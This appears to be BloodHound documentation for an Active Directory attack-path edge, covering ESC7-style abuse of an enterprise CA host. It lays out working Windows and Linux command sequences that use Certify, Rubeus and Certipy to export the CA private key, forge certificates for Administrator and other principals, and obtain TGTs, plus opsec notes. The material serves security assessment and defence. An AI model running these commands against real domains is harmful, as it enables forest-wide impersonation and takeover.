Applies to BloodHound Enterprise and CE The victim principal hosts the enrollment service of an enterprise CA, which implies it has the private key of the enterprise CA’s certificate. This private key allows an attacker to sign certificates for authentication as any enabled principal in the AD forest of the domain, as the enterprise CA is trusted for NT authentication and chain up to a root CA. It may not be possible to obtain the certificate private key if it is protected with a Trusted Platform Module (TPM) or using a Hardware Security Module (HSM). However, it may still be possible to compromise the AD forest. Administrative access to the enterprise CA host lets an attacker publish certificate templates, approve denied enrollment requests, and more. The victim principal will have an ESC7 edge to the domain if any such attack has been found possible by BloodHound.

Abuse Info

Windows

Step 1

Obtain CA certificate incl. private key Use Certify (2.0) to export all certificates in the local machine certificate store and identify the CA certificate by the name of the CA: 
Certify.exe manage-self --dump-certs

Step 2

Forge certificate and obtain a TGT as targeted principal. Forge a certificate of a target principal: 
Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500
Request a TGT for the targeted principal using the certificate with Rubeus: 
Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>

Linux

Step 1

Back up the CA certificate with the credentials of a user with admin access on the enterprise CA host using Certipy, and identify the CA certificate by the name of the CA. 
certipy ca -backup -ca 'dumpster-DC01-CA' -username jd@dumpster.fire -password 'Password123!'

Step 2

Forge a certificate of a target principal: 
certipy forge -ca-pfx dumpster-DC01-CA.pfx -upn Roshi@dumpster.fire -subject 'CN=Roshi,OU=Users,OU=Tier0,DC=dumpster,DC=fire'

Step 3

Request a TGT for the targeted principal using the certificate against a given DC: 
 certipy auth -pfx roshi_forged.pfx -dc-ip '192.168.100.10'

Opsec Considerations

When an attacker abuses a privilege escalation or impersonation primitive that relies on this relationship, it will necessarily result in the issuance of a certificate. A copy of the issued certificate will be saved on the host that issued the certificate.

References

This edge is related to the following MITRE ATT&CK tactic and techniques:

Abuse and Opsec references